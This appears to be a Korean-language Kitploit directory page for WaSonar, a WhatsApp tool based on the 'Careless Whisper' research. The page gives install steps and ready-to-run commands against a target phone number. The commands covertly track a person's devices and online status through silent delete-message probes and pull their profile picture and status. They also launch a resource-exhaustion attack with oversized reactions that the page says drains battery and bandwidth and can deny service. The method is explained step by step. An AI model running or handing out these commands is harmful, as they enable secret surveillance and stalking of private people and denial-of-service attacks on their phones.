Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
WaSonar — WhatsApp 인텔리전스 및 리소스 소진 도구. 보안 연구를 위한 실시간 기기 추적, 무음 RTT 프로빙, 프로토콜 스트레스 테스트 기능을 제공합니다. | Kitploit
도구/GitHubGitHub/ajayantoisdev/wasonar
OSINT (Open Source Intelligence)ReconnaissanceVulnerability AnalysisExploitationInformation GatheringPenetration TestingMobile SecurityPrivacy
GitHubajayantoisdev/wasonar

WaSonar

WhatsApp 인텔리전스 및 리소스 소진 도구. 보안 연구를 위한 실시간 기기 추적, 무음 RTT 프로빙, 프로토콜 스트레스 테스트 기능을 제공합니다.

저장소 보기
5158개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
WaSonar 로고 스크린샷

License Version Node.js

면책 조항: 이 도구는 교육 목적과 보안 연구 전용입니다. 개발자는 오용에 대해 책임을 지지 않습니다. 책임감 있고 윤리적으로 사용하시기 바랍니다.

WaSonar는 WhatsApp 프로토콜에 대한 교육 연구, 기기 추적, 스트레스 테스트를 위해 설계된 강력한 CLI 도구입니다. Baileys를 기반으로 구축되었습니다.

기능 • 설치 • 사용법


기능

  • 실시간 기기 추적: 모든 연결된 기기(Phone, Web, Desktop)의 정확한 온라인/오프라인 상태를 감지합니다.
  • 기기 검색: 대상 번호에 연결된 모든 기기(메인 폰 + 컴패니언 기기)를 나열합니다.
  • 프로필 추출: 프로필 사진, 상태/정보, JID를 가져옵니다.
  • 리소스 고갈: 초대형 리액션 페이로드로 기기를 압도합니다(Aggressive/Slow 모드).

설치

NPM으로 설치 (권장)

root@kitploit:~
npm install -g wasonar-cli

NPX로 실행 (설치 불필요)

root@kitploit:~
npx wasonar-cli <command>

소스에서 설치

root@kitploit:~
git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install

사용법

1. 로그인

먼저 WhatsApp 계정으로 인증해야 합니다.

root@kitploit:~
wasonar-cli login

터미널에 표시되는 QR 코드를 스캔하세요.

2. 기기 검색

대상 번호에 연결된 모든 기기를 나열합니다.

root@kitploit:~
wasonar-cli devices <target-number>

# Example:
wasonar-cli devices 919876543210

3. 온라인 상태 및 RTT

핵심 기능입니다. 기기가 온라인인지 감지하고 지연 시간을 측정하기 위해 무음 프로브를 전송합니다.

root@kitploit:~
# Probe infinite times (default)
wasonar-cli online 919876543210

# Send specific number of probes
wasonar-cli online 919876543210 --probes 5

# Save results to file
wasonar-cli online 919876543210 --output ./logs

참고: PENDING/OFFLINE은 서버가 메시지를 수신했지만 대상 기기가 수신을 확인하지 않았음을 의미합니다.

4. 프로필 추출

사용자의 프로필 사진과 상태를 가져옵니다.

root@kitploit:~
# Display info and download profile picture
wasonar-cli profile 919876543210 --output ./profiles

5. 리소스 고갈

⚠️ 교육 목적으로만 사용하세요. 고주파 초대형 페이로드를 전송합니다.

root@kitploit:~
# Aggressive mode (Default: 250 req/s, 1KB payload)
wasonar-cli exhaust 919876543210

# Slow mode (10 req/s, 500B payload)
wasonar-cli exhaust 919876543210 --aggression slow

# Set duration
wasonar-cli exhaust 919876543210 --duration 30

방법론

무음 프로브

WaSonar는 대상에게 알리지 않고 온라인 상태를 감지하기 위해 "무음 삭제 프로브"를 사용합니다.

  1. 존재하지 않는 메시지 ID에 대해 revoked(삭제) 메시지를 전송합니다.
  2. 대상 기기가 이 "삭제" 요청을 수신합니다.
  3. 온라인 상태라면 기기는 프로토콜 메시지에 대해 delivery_receipt(상태 3)를 전송합니다.
  4. WaSonar는 이 수신 확인을 포착하여 온라인 상태를 확인하고 RTT를 계산합니다.

고갈 공격

"Careless Whisper" 연구에 기반한 이 공격은 WhatsApp의 리액션 처리에서 검증 공백을 악용합니다.

기술적 세부 사항

유효하지 않은 리액션은 대상의 휴대폰에 표시되지 않지만, 여전히 수신되어 처리됩니다.

  • 페이로드 제한: WhatsApp 서버는 최대 1MB의 리액션 페이로드를 허용합니다.
  • 처리: 클라이언트는 이러한 메시지를 폐기하기 전에 처리하려 시도하여(유효한 표시를 위한 제한 약 30바이트) 리소스를 소비합니다.

영향 분석

연구 데이터는 리소스 고갈의 상당한 잠재력을 시사합니다:

  • 트래픽 인플레이션: 단일 세션으로 ~3.7MB/s(시간당 13.3GB)의 은밀한 트래픽을 생성할 수 있습니다.
  • 배터리 소모: 이러한 메시지의 빠른 처리는 최신 스마트폰(iPhone 13 Pro, S23에서 테스트)에서 기기가 대기 상태일 때 시간당 14-18%의 배터리를 소모할 수 있습니다.
  • 서비스 거부: 대역폭 소비는 피해자 기기의 다른 애플리케이션에 대한 서비스 거부로 이어질 수 있습니다.

인용

Gegenhuber 외, University of Vienna & SBA Research의 연구에 기반:

root@kitploit:~
@inproceedings{gegenhuber2024careless,
  title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
  author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
  year={2024},
  organization={University of Vienna, SBA Research}
}

AjayAnto 제작

도구 다운로드